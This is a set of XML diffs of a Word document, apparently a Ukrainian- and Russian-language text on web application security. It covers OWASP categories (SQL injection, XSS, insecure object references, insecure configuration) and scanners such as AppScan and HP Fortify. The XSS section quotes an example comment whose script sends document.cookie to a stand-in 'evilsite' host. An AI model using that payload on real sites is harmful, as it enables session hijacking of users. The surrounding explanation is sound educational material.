+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1416" w:firstLine="708"/>
         <w:textAlignment w:val="baseline"/>
         <w:outlineLvl w:val="1"/>
         <w:rPr>
@@ -24831,6 +25620,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
       </w:r>
       <w:r>
@@ -24947,18 +25737,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="474747"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
+        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and allows users to focus on different client-side issues and DOM (document object model) based XSS problems.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25600,6 +26379,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Из особенностей продукта стоит выделить наличие в HP Fortify Static Code Analyzer поддержки интеграции с различными системами управления разработкой и отслеживания ошибок. Если разработчик программного кода предоставляет заказчику доступ к прямой передаче сообщений об ошибках в Bugzilla, HP Quality Center или Microsoft TFS, анализатор может автоматически создавать сообщения об ошибках в этих системах без необходимости ручных действий. Работа продукта основана на собственных базах знаний HP Fortify, сформированных адаптацией базы CWE. В продукте реализован анализ на выполнение требований DISA STIG, FISMA, PCI DSS и рекомендаций OWASP.</w:t>
       </w:r>
       <w:r>
@@ -25611,8 +26391,6 @@
         </w:rPr>
         <w:br/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -29518,6 +30296,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -29898,6 +30677,7 @@
   <w:style w:type="character" w:default="1" w:styleId="a0">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="a1">
@@ -30385,7 +31165,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{78AC16E4-7FEA-41D9-9AC3-12F5C364D1F4}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{740880D6-EE86-4E82-AC72-5D9FA9414C9D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

</xml_diff>

<commit_message>
with owasp description + full life cycle v4
</commit_message>
<xml_diff>
--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -25096,29 +25096,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">1. </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>Ін’єкція</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> коду</w:t>
+        <w:t>1. Ін’єкція коду</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25144,161 +25122,7 @@
           <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>Ін’єкція коду завжди бул</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займа</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>є</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> верхню строчку списку OWASP. Існує безліч різновидів цієї у</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>разливості, але до сих пір самою сумнозвісною</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> з них є </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>н’єкція</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> SQL-коду. Вона </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатк</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>а</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> не відфільтровує </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>дані</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
+        <w:t xml:space="preserve">Ін’єкція коду завжди була однією з найбільш значущих і поширених вразливостей Web-додатків, тому не дивно, що цей тип вразливостей займає верхню строчку списку OWASP. Існує безліч різновидів цієї уразливості, але до сих пір самою сумнозвісною з них є ін’єкція SQL-коду. Вона успішно використовується хакерами протягом більше десяти років. SQL ін'єкція полягає в тому, що зловмисник вводить SQL-команди в поле введення. Якщо код Web-додатка не відфільтровує дані, то на Web-сервері можна запустити SQL-команди і виконувати прямі запити до внутрішньої бази даних в обхід </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -25526,8 +25350,1019 @@
         </w:rPr>
         <w:tab/>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>3. Міжсайтовий скриптинг</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Міжсайтовий скриптинг (cross-site scripting, XSS) - це ще один різновид атаки на Web-додатки, що зберігає популярність вже багато років. Якщо Web-додаток містить XSS-уразливість, то зловмисник може впровадити на Web-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>сторінку шкідливий сценарій, що виконується при завантаженні сторінки користувачем.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Приклад XSS-атаки</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Якщо Web-додаток дозволяє користувачам заходити на Web-сторінку і розміщувати відгуки, то поле для введення коментаря схильне</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> до</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> XSS-атак. Нижче показаний приклад коментаря (This is a great product &lt;script&gt; document.write ( '&lt;img scr = http: //evilsite/'+document.cookie&gt;'); &lt;/ script &gt;&gt;), що впроваджує в Web-сторінку XSS -сценарій, який намагається дізнатися ідентифікатор сеансу користувача.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>4. Небезпечні прямі посилання на об'єкти</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Вразливість</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>, обумовлена ​​наявністю небезпечних прямих посилань на об'єкти, може привести до того, що авторизований користувач Web-додатки може отримати неавторизований доступ до привілейованих функцій і даних. Якщо в коді програми неграмотно або неправильно реалізовані методи роботи з інформаційними об'єктами (наприклад, з файлами, каталогами або ключами баз даних), то користувачі, що не володіють необхідними привілеями, можуть обійти засоби захисту, реалізовані в додатку. Використовуючи цю вразливість, користувачі можуть змінювати значення параметрів таким чином, щоб безпосередньо звертатися до об'єктів, доступ до яких їм заборонено</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>5. Небезпечна конфігурація</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Небезпечна конфігурація може бути присутн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">я </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>у всіх компонентах Web-додатки, включаючи платформу (операційну систему), Web-сервер, бази даних або інфраструктуру. Поширеними помилками є запущені без необхідності служби, облікові записи адміністратора з параметрами за замовчуванням, доступне для онлайн-перегляду вміст файлів і директорій. Однак улюбленою темою хакерів є небезпечна обробка повідомлень про помилки.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
